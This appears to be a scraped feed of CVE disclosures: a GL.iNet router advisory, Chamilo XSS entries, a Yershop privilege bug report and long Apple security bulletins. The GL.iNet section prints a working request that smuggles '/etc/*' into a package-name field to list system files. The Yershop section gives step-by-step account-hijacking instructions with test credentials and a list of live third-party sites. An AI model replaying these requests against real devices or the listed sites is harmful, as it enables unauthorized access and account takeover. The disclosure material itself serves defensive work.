An issue was discovered on GL.iNet devices before 3.216. Through the software installation feature, it is possible to inject arbitrary parameters in a request to cause opkg to obtain a list of files in a specific directory, by using the regex feature in a package name.

Through the software installation feature, it is possible to inject arbitrary parameters in the request so as to exploit opkg to get the list of files in a specific directory, using the regex feature in package name.

    Request:
    
    POST /cgi-bin/api/software/install HTTP/1.1
    Host: 192.168.8.1
    Content-Length: 11
    Accept: application/json, text/javascript, */*; q=0.01
    X-Requested-With: XMLHttpRequest
    Authorization: ce0fc001ff684088a83257360de4bb44
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.65 Safari/537.36
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    Origin: http://192.168.8.1
    Referer: http://192.168.8.1/
    Accept-Encoding: gzip, deflate
    Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
    Cookie: Admin-Token=ce0fc001ff684088a83257360de4bb44
    Connection: close
    
    name=/etc/*
    
    Response:
    
    HTTP/1.1 200 OK
    Content-Type: application/json
    Content-Length: 8221
    Connection: close
    Date: Sun, 19 Mar 2023 08:31:23 GMT
    Server: lighttpd/1.4.48
    
    {"code":-13,"stderr":"Collected errors:\n * opkg_install_cmd: Cannot install package \/etc\/TZ.\n * opkg_install_cmd: Cannot install package \/etc\/Visible_profile.\n * opkg_install_cmd: Cannot install package \/etc\/banner.\n * opkg_install_cmd: Cannot install package \/etc\/banner.failsafe.\n * opkg_install_cmd: Cannot install package \/etc\/board.d.\n * opkg_install_cmd: Cannot install package \/etc\/board.json.\n * opkg_install_cmd: Cannot install package \/etc\/chatscripts.\n * opkg_install_cmd: Cannot install package \/etc\/config.\n * opkg_install_cmd: Cannot install package \/etc\/crontabs.\n * opkg_install_cmd: Cannot install package \/etc\/ddns.\n * opkg_install_cmd: Cannot install package \/etc\/device_info.\n * opkg_install_cmd: Cannot install package \/etc\/diag.sh.\n * opkg_install_cmd: Cannot install package \/etc\/dnsmasq.conf.\n * opkg_install_cmd: Cannot install package \/etc\/dropbear.\n * opkg_install_cmd: Cannot install package \/etc\/ethers.\n * opkg_install_cmd: Cannot install package \/etc\/ethertypes.\n * opkg_install_cmd: Cannot install package \/etc\/filesystems.\n * opkg_install_cmd: Cannot install package \/etc\/firewall.nat6.\n * opkg_install_cmd: Cannot install package \/etc\/firewall.user.\n * opkg_install_cmd: Cannot install package \/etc\/forward.\n * opkg_install_cmd: Cannot install package \/etc\/fstab.\n * opkg_install_cmd: Cannot install package \/etc\/fw_env.config.\n * opkg_install_cmd: Cannot install package \/etc\/gcom.\n * opkg_install_cmd: Cannot install package \/etc\/glversion.\n * opkg_install_cmd: Cannot install package \/etc\/group.\n * opkg_install_cmd: Cannot install package \/etc\/hosts.\n * opkg_install_cmd: Cannot install package \/etc\/hotplug-preinit.json.\n * opkg_install_cmd: Cannot install package \/etc\/hotplug.d.\n * opkg_install_cmd: Cannot install package \/etc\/hotplug.json.\n * opkg_install_cmd: Cannot install package \/etc\/init.d.\n * opkg_install_cmd: Cannot install package \/etc\/inittab.\n * opkg_install_cmd: Cannot install package \/etc\/ip-up.d.\n * opkg_install_cmd: Cannot install package \/etc\/iproute2.\n * opkg_install_cmd: Cannot install package \/etc\/lighttpd.\n * opkg_install_cmd: Cannot install package \/etc\/localtime.\n * opkg_install_cmd: Cannot install package \/etc\/lockdown.\n * opkg_install_cmd: Cannot install package \/etc\/log.\n * opkg_install_cmd: Cannot install package \/etc\/modules-boot.d.\n * opkg_install_cmd: Cannot install package \/etc\/modules.d.\n * opkg_install_cmd: Cannot install package \/etc\/mtab.\n * opkg_install_cmd: Cannot install package \/etc\/mwan3.user.\n * opkg_install_cmd: Cannot install package \/etc\/nodogsplash.\n * opkg_install_cmd: Cannot install package \/etc\/openvpn.\n * opkg_install_cmd: Cannot install package \/etc\/openvpn.user.\n * opkg_install_cmd: Cannot install package \/etc\/openwrt_release.\n * opkg_install_cmd: Cannot install package \/etc\/openwrt_version.\n * opkg_install_cmd: Cannot install package \/etc\/opkg.\n * opkg_install_cmd: Cannot install package \/etc\/opkg.conf.\n * opkg_install_cmd: Cannot install package \/etc\/os-release.\n * opkg_install_cmd: Cannot install package \/etc\/passwd.\n * opkg_install_cmd: Cannot install package \/etc\/passwd-.\n * opkg_install_cmd: Cannot install package \/etc\/ppp.\n * opkg_install_cmd: Cannot install package \/etc\/preinit.\n * opkg_install_cmd: Cannot install package \/etc\/profile.\n * opkg_install_cmd: Cannot install package \/etc\/protocols.\n * opkg_install_cmd: Cannot install package \/etc\/rc.button.\n * opkg_install_cmd: Cannot install package \/etc\/rc.common.\n * opkg_install_cmd: Cannot install package \/etc\/rc.d.\n * opkg_install_cmd: Cannot install package \/etc\/rc.local.\n * opkg_install_cmd: Cannot install package \/etc\/resolv.conf.\n * opkg_install_cmd: Cannot install package \/etc\/route_policy.\n * opkg_install_cmd: Cannot install package \/etc\/samba.\n * opkg_install_cmd: Cannot install package \/etc\/services.\n * opkg_install_cmd: Cannot install package \/etc\/shadow.\n * opkg_install_cmd: Cannot install package \/etc\/shadow-.\n * "}

CVE-2023-31474: CVE-issues/Directory_Listing.md at main · gl-inet/CVE-issues

Cross Site Scripting vulnerability found in Chamilo Lms v.1.11.18 allows a local attacker to execute arbitrary code via the course category parameters.

CVE-2023-31804: Security issues - Chamilo LMS

Cross Site Scripting vulnerability found in Chamilo Lms v.1.11.18 allows a local attacker to execute arbitrary code via the skype and linedin_url parameters.

CVE-2023-31802: Security issues - Chamilo LMS

Cross Site Scripting vulnerability found in Chamilo Lms v.1.11.18 allows a local attacker to execute arbitrary code via the skills wheel parameter.

CVE-2023-31801: Security issues - Chamilo LMS

Cross Site Scripting vulnerability found in Chamilo Lms v.1.11.18 allows a local attacker to execute arbitrary code via the forum title parameter.

CVE-2023-31800: Security issues - Chamilo LMS

Insecure Permissons vulnerability found in Shop_CMS YerShop all versions allows a remote attacker to escalate privileges via the cover_id parameter.

Yershop mall has a horizontal ultra vires vulnerability, which can be used to maliciously change any user name for the full version of the vulnerability, resulting in the user unable to log in the account.

The account passwords of the following cases are all below

Account 1: lu0r3n

Password: lu0r3n

Account 2: lu0r3n1

Password: lu0r3n

Case 1: http://39.105.34.27/projects/index.php/index/index/index.html

Landing place: http://39.105.34.27/projects/index.php/index/user/login.html

Personal data change office: http://39.105.34.27/projects/index.php/index/user/edit.html  

Use burp to cut package when saving

Packet:

POST /projects/ index.php/index/user/edit .html HTTP/1.1

Host: 39.105.34.27

Content-Length: 66

Accept: application/json, text/javascript, _/_; q=0.01

X-Requested-With: XMLHttpRequest

User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.100 Safari/537.36

Content-Type: application/x-www-form-urlencoded; charset=UTF-8

Origin: http://39.105.34.27

Referer: http://39.105.34.27/projects/index.php/index/user/edit.html

Accept-Encoding: gzip, deflate

Accept-Language: zh-CN,zh;q=0.9

Cookie: j1eU\_ 2132\_ saltkey=nj6wEe8s; j1eU\_ 2132\_ lastvisit=1588948355; j1eU\_ 2132\_ sid=UQR48r; PHPSESSID=174ae4d03e7fb8e838248372b01e3c3f; j1eU\_ 2132\_ lastact=1588952051%09 index.php%09

Connection: close

cover\_ id=1&username=lu0r3n&sex=%E4%BF%9D%E5%AF%86&birthday=&id=382

Change id = 382 to id = 381 (because the ID of account 2 is 381, change the user name of account 2 here), change username = lu0r3n to hack, and then put the package

Come to the login place again, try to log in with the previous account password, but the user does not exist

Change lu0r3n1 to hack to log in and prove that the vulnerability exists

Case 2: http://www.sqdd.xyz/index.php/index/index/index.html

Landing place: http://www.sqdd.xyz/index.php/index/user/login.html

Personal information change: http://www.sqdd.xyz/index.php/index/user/edit.html

Case 3: http://www.cyawl.com/index.php/index/index/index.html

Landing place: http://www.cyawl.com/index.php/index/user/login.html

Personal information change: http://www.cyawl.com/index.php/index/member/edit.html

Case 4: http://www.dp378.cn/index.php/index/index/index.html

Landing place: http://www.dp378.cn/index.php/index/user/login.html

Personal information change: http://www.dp378.cn/index.php/index/member/edit.html

Case 5: https://demo.yershop.com/index.php/index/index/index.html

Landing place: https://demo.yershop.com/index.php/index/user/login.html

Personal information change: https://demo.yershop.com/index.php/index/user/edit.html

Case 6: http://www.girltoo.com/

Landing place: http://www.girltoo.com/index.php?s=/Home/User/login.html

Personal information change: http://www.girltoo.com/index.php?s=/Home/center/information.html

CVE-2020-23362: Beyond authority loophole in Yershop · Issue #1 · huyiwill/shopcms_lang

A validation issue was addressed with improved input sanitization. This issue is fixed in macOS Ventura 13.3, macOS Monterey 12.6.4, iOS 15.7.4 and iPadOS 15.7.4, macOS Big Sur 11.7.5. An app may be able to disclose kernel memory

Released March 27, 2023

**Apple Neural Engine**

Available for: macOS Big Sur

Impact: An app may be able to execute arbitrary code with kernel privileges

Description: The issue was addressed with improved memory handling.

CVE-2023-23540: Mohamed GHANNAM (@\_simo36)

**AppleAVD**

Available for: macOS Big Sur

Impact: An application may be able to execute arbitrary code with kernel privileges

Description: A use after free issue was addressed with improved memory management.

CVE-2022-26702: an anonymous researcher, Antonio Zekic (@antoniozekic), and John Aakerblom (@jaakerblom)

**AppleMobileFileIntegrity**

Available for: macOS Big Sur

Impact: A user may gain access to protected parts of the file system

Description: The issue was addressed with improved checks.

CVE-2023-23527: Mickey Jin (@patch1t)

**Archive Utility**

Available for: macOS Big Sur

Impact: An archive may be able to bypass Gatekeeper

Description: The issue was addressed with improved checks.

CVE-2023-27951: Brandon Dalton of Red Canary and Csaba Fitzl (@theevilbit) of Offensive Security

**Calendar**

Available for: macOS Big Sur

Impact: Importing a maliciously crafted calendar invitation may exfiltrate user information

Description: Multiple validation issues were addressed with improved input sanitization.

CVE-2023-27961: Rıza Sabuncu (@rizasabuncu)

**Carbon Core**

Available for: macOS Big Sur

Impact: Processing a maliciously crafted image may result in disclosure of process memory

Description: The issue was addressed with improved checks.

CVE-2023-23534: Mickey Jin (@patch1t)

**ColorSync**

Available for: macOS Big Sur

Impact: An app may be able to read arbitrary files

Description: The issue was addressed with improved checks.

CVE-2023-27955: JeongOhKyea

**CommCenter**

Available for: macOS Big Sur

Impact: An app may be able to cause unexpected system termination or write kernel memory

Description: An out-of-bounds write issue was addressed with improved input validation.

CVE-2023-27936: Tingting Yin of Tsinghua University

**dcerpc**

Available for: macOS Big Sur

Impact: A remote user may be able to cause unexpected app termination or arbitrary code execution

Description: The issue was addressed with improved bounds checks.

CVE-2023-27935: Aleksandar Nikolic of Cisco Talos

**dcerpc**

Available for: macOS Big Sur

Impact: A remote user may be able to cause unexpected system termination or corrupt kernel memory

Description: The issue was addressed with improved memory handling.

CVE-2023-27953: Aleksandar Nikolic of Cisco Talos

CVE-2023-27958: Aleksandar Nikolic of Cisco Talos

**Find My**

Available for: macOS Big Sur

Impact: An app may be able to read sensitive location information

Description: A privacy issue was addressed with improved private data redaction for log entries.

CVE-2023-23537: an anonymous researcher

**Foundation**

Available for: macOS Big Sur

Impact: Parsing a maliciously crafted plist may lead to an unexpected app termination or arbitrary code execution

Description: An integer overflow was addressed with improved input validation.

CVE-2023-27937: an anonymous researcher

**Identity Services**

Available for: macOS Big Sur

Impact: An app may be able to access information about a user’s contacts

Description: A privacy issue was addressed with improved private data redaction for log entries.

CVE-2023-27928: Csaba Fitzl (@theevilbit) of Offensive Security

**ImageIO**

Available for: macOS Big Sur

Impact: Processing a maliciously crafted file may lead to unexpected app termination or arbitrary code execution

Description: An out-of-bounds read was addressed with improved bounds checking.

CVE-2023-27946: Mickey Jin (@patch1t)

**ImageIO**

Available for: macOS Big Sur

Impact: Processing a maliciously crafted image may result in disclosure of process memory

Description: The issue was addressed with improved memory handling.

CVE-2023-23535: ryuzaki

**Kernel**

Available for: macOS Big Sur

Impact: An app may be able to execute arbitrary code with kernel privileges

Description: A use after free issue was addressed with improved memory management.

CVE-2023-23514: Xinru Chi of Pangu Lab and Ned Williamson of Google Project Zero

**Kernel**

Available for: macOS Big Sur

Impact: An app may be able to disclose kernel memory

Description: A validation issue was addressed with improved input sanitization.

CVE-2023-28200: Arsenii Kostromin (0x3c3e)

**NetworkExtension**

Available for: macOS Big Sur

Impact: A user in a privileged network position may be able to spoof a VPN server that is configured with EAP-only authentication on a device

Description: The issue was addressed with improved authentication.

CVE-2023-28182: Zhuowei Zhang

**PackageKit**

Available for: macOS Big Sur

Impact: An app may be able to modify protected parts of the file system

Description: A logic issue was addressed with improved checks.

CVE-2023-27962: Mickey Jin (@patch1t)

**System Settings**

Available for: macOS Big Sur

Impact: An app may be able to access user-sensitive data

Description: A privacy issue was addressed with improved private data redaction for log entries.

CVE-2023-23542: an anonymous researcher

**System Settings**

Available for: macOS Big Sur

Impact: An app may be able to read sensitive location information

Description: A permissions issue was addressed with improved validation.

CVE-2023-28192: Guilherme Rambo of Best Buddy Apps (rambo.codes)

**Vim**

Available for: macOS Big Sur

Impact: Multiple issues in Vim

Description: Multiple issues were addressed by updating to Vim version 9.0.1191.

CVE-2023-0433

CVE-2023-0512

**XPC**

Available for: macOS Big Sur

Impact: An app may be able to break out of its sandbox

Description: This issue was addressed with a new entitlement.

CVE-2023-27944: Mickey Jin (@patch1t)

CVE-2023-28200: About the security content of macOS Big Sur 11.7.5

The issue was addressed with improved memory handling. This issue is fixed in Xcode 14.3. An app may be able to execute arbitrary code out of its sandbox or with certain elevated privileges

This document describes the security content of Xcode 14.3.

**About Apple security updates**

For our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the Apple security updates page.

Apple security documents reference vulnerabilities by CVE-ID when possible.

For more information about security, see the Apple Product Security page.

**Xcode 14.3**

Released March 30, 2023

**Dev Tools**

Available for: macOS Ventura 13.0 and later

Impact: An app may be able to execute arbitrary code out of its sandbox or with certain elevated privileges

Description: The issue was addressed with improved memory handling.

CVE-2023-27967: Austin Emmitt, Senior Security Researcher at Trellix ARC

**Dev Tools**

Available for: macOS Ventura 13.0 and later

Impact: A sandboxed app may be able to collect system logs

Description: This issue was addressed with improved entitlements.

CVE-2023-27945: Mickey Jin (@patch1t)

Information about products not manufactured by Apple, or independent websites not controlled or tested by Apple, is provided without recommendation or endorsement. Apple assumes no responsibility with regard to the selection, performance, or use of third-party websites or products. Apple makes no representations regarding third-party website accuracy or reliability. Contact the vendor for additional information.

Published Date: March 30, 2023

CVE-2023-27967: About the security content of Xcode 14.3

This issue was addressed with improved state management. This issue is fixed in macOS Ventura 13.3, iOS 15.7.4 and iPadOS 15.7.4, Safari 16.4, iOS 16.4 and iPadOS 16.4. A remote user may be able to cause unexpected app termination or arbitrary code execution

Released March 27, 2023

**Accessibility**

Available for: iPhone 6s (all models), iPhone 7 (all models), iPhone SE (1st generation), iPad Air 2, iPad mini (4th generation), and iPod touch (7th generation)

Impact: An app may be able to access information about a user’s contacts

Description: A privacy issue was addressed with improved private data redaction for log entries.

CVE-2023-23541: Csaba Fitzl (@theevilbit) of Offensive Security

**Calendar**

Available for: iPhone 6s (all models), iPhone 7 (all models), iPhone SE (1st generation), iPad Air 2, iPad mini (4th generation), and iPod touch (7th generation)

Impact: Importing a maliciously crafted calendar invitation may exfiltrate user information

Description: Multiple validation issues were addressed with improved input sanitization.

CVE-2023-27961: Rıza Sabuncu (@rizasabuncu)

**Camera**

Available for: iPhone 6s (all models), iPhone 7 (all models), iPhone SE (1st generation), iPad Air 2, iPad mini (4th generation), and iPod touch (7th generation)

Impact: A sandboxed app may be able to determine which app is currently using the camera

Description: The issue was addressed with additional restrictions on the observability of app states.

CVE-2023-23543: Yiğit Can YILMAZ (@yilmazcanyigit)

**CommCenter**

Available for: iPhone 6s (all models), iPhone 7 (all models), iPhone SE (1st generation), iPad Air 2, iPad mini (4th generation), and iPod touch (7th generation)

Impact: An app may be able to cause unexpected system termination or write kernel memory

Description: An out-of-bounds write issue was addressed with improved input validation.

CVE-2023-27936: Tingting Yin of Tsinghua University

**Find My**

Available for: iPhone 6s (all models), iPhone 7 (all models), iPhone SE (1st generation), iPad Air 2, iPad mini (4th generation), and iPod touch (7th generation)

Impact: An app may be able to read sensitive location information

Description: A privacy issue was addressed with improved private data redaction for log entries.

CVE-2023-23537: an anonymous researcher

**FontParser**

Available for: iPhone 6s (all models), iPhone 7 (all models), iPhone SE (1st generation), iPad Air 2, iPad mini (4th generation), and iPod touch (7th generation)

Impact: Processing a maliciously crafted image may result in disclosure of process memory

Description: The issue was addressed with improved memory handling.

CVE-2023-27956: Ye Zhang of Baidu Security

**Identity Services**

Available for: iPhone 6s (all models), iPhone 7 (all models), iPhone SE (1st generation), iPad Air 2, iPad mini (4th generation), and iPod touch (7th generation)

Impact: An app may be able to access information about a user’s contacts

Description: A privacy issue was addressed with improved private data redaction for log entries.

CVE-2023-27928: Csaba Fitzl (@theevilbit) of Offensive Security

**ImageIO**

Available for: iPhone 6s (all models), iPhone 7 (all models), iPhone SE (1st generation), iPad Air 2, iPad mini (4th generation), and iPod touch (7th generation)

Impact: Processing a maliciously crafted file may lead to unexpected app termination or arbitrary code execution

Description: An out-of-bounds read was addressed with improved bounds checking.

CVE-2023-27946: Mickey Jin (@patch1t)

**ImageIO**

Available for: iPhone 6s (all models), iPhone 7 (all models), iPhone SE (1st generation), iPad Air 2, iPad mini (4th generation), and iPod touch (7th generation)

Impact: Processing a maliciously crafted image may result in disclosure of process memory

Description: The issue was addressed with improved memory handling.

CVE-2023-23535: ryuzaki

**Kernel**

Available for: iPhone 6s (all models), iPhone 7 (all models), iPhone SE (1st generation), iPad Air 2, iPad mini (4th generation), and iPod touch (7th generation)

Impact: An app may be able to disclose kernel memory

Description: A validation issue was addressed with improved input sanitization.

CVE-2023-28200: Arsenii Kostromin (0x3c3e)

Entry added May 1, 2023

**Kernel**

Available for: iPhone 6s (all models), iPhone 7 (all models), iPhone SE (1st generation), iPad Air 2, iPad mini (4th generation), and iPod touch (7th generation)

Impact: An app may be able to disclose kernel memory

Description: A validation issue was addressed with improved input sanitization.

CVE-2023-27941: Arsenii Kostromin (0x3c3e)

**Kernel**

Available for: iPhone 6s (all models), iPhone 7 (all models), iPhone SE (1st generation), iPad Air 2, iPad mini (4th generation), and iPod touch (7th generation)

Impact: An app may be able to execute arbitrary code with kernel privileges

Description: A use after free issue was addressed with improved memory management.

CVE-2023-27969: Adam Doupé of ASU SEFCOM

**Kernel**

Available for: iPhone 6s (all models), iPhone 7 (all models), iPhone SE (1st generation), iPad Air 2, iPad mini (4th generation), and iPod touch (7th generation)

Impact: An app may be able to execute arbitrary code with kernel privileges

Description: The issue was addressed with improved bounds checks.

CVE-2023-23536: Félix Poulin-Bélanger

Entry added May 1, 2023

**Model I/O**

Available for: iPhone 6s (all models), iPhone 7 (all models), iPhone SE (1st generation), iPad Air 2, iPad mini (4th generation), and iPod touch (7th generation)

Impact: Processing a maliciously crafted file may lead to unexpected app termination or arbitrary code execution

Description: An out-of-bounds read was addressed with improved input validation.

CVE-2023-27949: Mickey Jin (@patch1t)

**NetworkExtension**

Available for: iPhone 6s (all models), iPhone 7 (all models), iPhone SE (1st generation), iPad Air 2, iPad mini (4th generation), and iPod touch (7th generation)

Impact: A user in a privileged network position may be able to spoof a VPN server that is configured with EAP-only authentication on a device

Description: The issue was addressed with improved authentication.

CVE-2023-28182: Zhuowei Zhang

**Shortcuts**

Available for: iPhone 6s (all models), iPhone 7 (all models), iPhone SE (1st generation), iPad Air 2, iPad mini (4th generation), and iPod touch (7th generation)

Impact: A shortcut may be able to use sensitive data with certain actions without prompting the user

Description: The issue was addressed with additional permissions checks.

CVE-2023-27963: Jubaer Alnazi Jabin of TRS Group Of Companies, and Wenchao Li and Xiaolong Bai of Alibaba Group

**WebKit**

Available for: iPhone 6s (all models), iPhone 7 (all models), iPhone SE (1st generation), iPad Air 2, iPad mini (4th generation), and iPod touch (7th generation)

Impact: A website may be able to track sensitive user information

Description: The issue was addressed by removing origin information.

WebKit Bugzilla: 250837  
CVE-2023-27954: an anonymous researcher

**WebKit**

Available for: iPhone 6s (all models), iPhone 7 (all models), iPhone SE (1st generation), iPad Air 2, iPad mini (4th generation), and iPod touch (7th generation)

Impact: Processing maliciously crafted web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited.

Description: A type confusion issue was addressed with improved checks.

WebKit Bugzilla: 251944  
CVE-2023-23529: an anonymous researcher

**WebKit Web Inspector**

Available for: iPhone 6s (all models), iPhone 7 (all models), iPhone SE (1st generation), iPad Air 2, iPad mini (4th generation), and iPod touch (7th generation)

Impact: A remote user may be able to cause unexpected app termination or arbitrary code execution

Description: This issue was addressed with improved state management.

CVE-2023-28201: Dohyun Lee (@l33d0hyun), crixer (@pwning\_me) of SSD Labs

Entry added May 1, 2023

CVE-2023-28201: About the security content of iOS 15.7.4 and iPadOS 15.7.4

The issue was addressed with improved checks. This issue is fixed in iOS 16.4 and iPadOS 16.4. An app may be able to unexpectedly create a bookmark on the Home Screen

Released March 27, 2023

**Accessibility**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: An app may be able to access information about a user’s contacts

Description: A privacy issue was addressed with improved private data redaction for log entries.

CVE-2023-23541: Csaba Fitzl (@theevilbit) of Offensive Security

**Apple Neural Engine**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: An app may be able to execute arbitrary code with kernel privileges

Description: The issue was addressed with improved memory handling.

CVE-2023-23540: Mohamed GHANNAM (@\_simo36)

CVE-2023-27959: Mohamed GHANNAM (@\_simo36)

**Apple Neural Engine**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: An app may be able to execute arbitrary code with kernel privileges

Description: An out-of-bounds write issue was addressed with improved bounds checking.

CVE-2023-27970: Mohamed GHANNAM

**Apple Neural Engine**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: An app may be able to break out of its sandbox

Description: This issue was addressed with improved checks.

CVE-2023-23532: Mohamed Ghannam (@\_simo36)

**AppleMobileFileIntegrity**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: A user may gain access to protected parts of the file system

Description: The issue was addressed with improved checks.

CVE-2023-23527: Mickey Jin (@patch1t)

**AppleMobileFileIntegrity**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: An app may be able to access user-sensitive data

Description: This issue was addressed by removing the vulnerable code.

CVE-2023-27931: Mickey Jin (@patch1t)

**Calendar**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: Importing a maliciously crafted calendar invitation may exfiltrate user information

Description: Multiple validation issues were addressed with improved input sanitization.

CVE-2023-27961: Rıza Sabuncu (@rizasabuncu)

**Camera**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: A sandboxed app may be able to determine which app is currently using the camera

Description: The issue was addressed with additional restrictions on the observability of app states.

CVE-2023-23543: Yiğit Can YILMAZ (@yilmazcanyigit)

**CarPlay**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: A user in a privileged network position may be able to cause a denial-of-service

Description: A buffer overflow was addressed with improved bounds checking.

CVE-2023-23494: Itay Iellin of General Motors Product Cyber Security

**ColorSync**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: An app may be able to read arbitrary files

Description: The issue was addressed with improved checks.

CVE-2023-27955: JeongOhKyea

**Core Bluetooth**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: Processing a maliciously crafted Bluetooth packet may result in disclosure of process memory

Description: An out-of-bounds read was addressed with improved bounds checking.

CVE-2023-23528: Jianjun Dai and Guang Gong of 360 Vulnerability Research Institute

**CoreCapture**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: An app may be able to execute arbitrary code with kernel privileges

Description: The issue was addressed with improved memory handling.

CVE-2023-28181: Tingting Yin of Tsinghua University

**Find My**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: An app may be able to read sensitive location information

Description: A privacy issue was addressed with improved private data redaction for log entries.

CVE-2023-23537: an anonymous researcher

**FontParser**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: Processing a maliciously crafted image may result in disclosure of process memory

Description: The issue was addressed with improved memory handling.

CVE-2023-27956: Ye Zhang of Baidu Security

**Foundation**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: Parsing a maliciously crafted plist may lead to an unexpected app termination or arbitrary code execution

Description: An integer overflow was addressed with improved input validation.

CVE-2023-27937: an anonymous researcher

**iCloud**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: A file from an iCloud shared-by-me folder may be able to bypass Gatekeeper

Description: This was addressed with additional checks by Gatekeeper on files downloaded from an iCloud shared-by-me folder.

CVE-2023-23526: Jubaer Alnazi of TRS Group of Companies

**Identity Services**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: An app may be able to access information about a user’s contacts

Description: A privacy issue was addressed with improved private data redaction for log entries.

CVE-2023-27928: Csaba Fitzl (@theevilbit) of Offensive Security

**ImageIO**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: Processing a maliciously crafted image may result in disclosure of process memory

Description: The issue was addressed with improved memory handling.

CVE-2023-23535: ryuzaki

**ImageIO**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: Processing a maliciously crafted image may result in disclosure of process memory

Description: An out-of-bounds read was addressed with improved input validation.

CVE-2023-27929: Meysam Firouzi (@R00tkitSMM) of Mbition Mercedes-Benz Innovation Lab and jzhu working with Trend Micro Zero Day Initiative

**Kernel**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: An app may be able to execute arbitrary code with kernel privileges

Description: A use after free issue was addressed with improved memory management.

CVE-2023-27969: Adam Doupé of ASU SEFCOM

**Kernel**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: An app with root privileges may be able to execute arbitrary code with kernel privileges

Description: The issue was addressed with improved memory handling.

CVE-2023-27933: sqrtpwn

**Kernel**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: An app may be able to execute arbitrary code with kernel privileges

Description: The issue was addressed with improved bounds checks.

CVE-2023-23536: Félix Poulin-Bélanger

Entry added May 1, 2023

**LaunchServices**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: Files downloaded from the internet may not have the quarantine flag applied

Description: This issue was addressed with improved checks.

CVE-2023-27943: an anonymous researcher, Brandon Dalton, Milan Tenk, and Arthur Valiev

**LaunchServices**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: An app may be able to gain root privileges

Description: This issue was addressed with improved checks.

CVE-2023-23525: Mickey Jin (@patch1t)

**NetworkExtension**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: A user in a privileged network position may be able to spoof a VPN server that is configured with EAP-only authentication on a device

Description: The issue was addressed with improved authentication.

CVE-2023-28182: Zhuowei Zhang

**Photos**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: Photos belonging to the Hidden Photos Album could be viewed without authentication through Visual Lookup

Description: A logic issue was addressed with improved restrictions.

CVE-2023-23523: developStorm

**Podcasts**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: An app may be able to access user-sensitive data

Description: The issue was addressed with improved checks.

CVE-2023-27942: Mickey Jin (@patch1t)

**Safari**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: An app may be able to unexpectedly create a bookmark on the Home Screen

Description: The issue was addressed with improved checks.

CVE-2023-28194: Anton Spivak

**Sandbox**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: An app may be able to bypass Privacy preferences

Description: A logic issue was addressed with improved validation.

CVE-2023-28178: Yiğit Can YILMAZ (@yilmazcanyigit)

**Shortcuts**

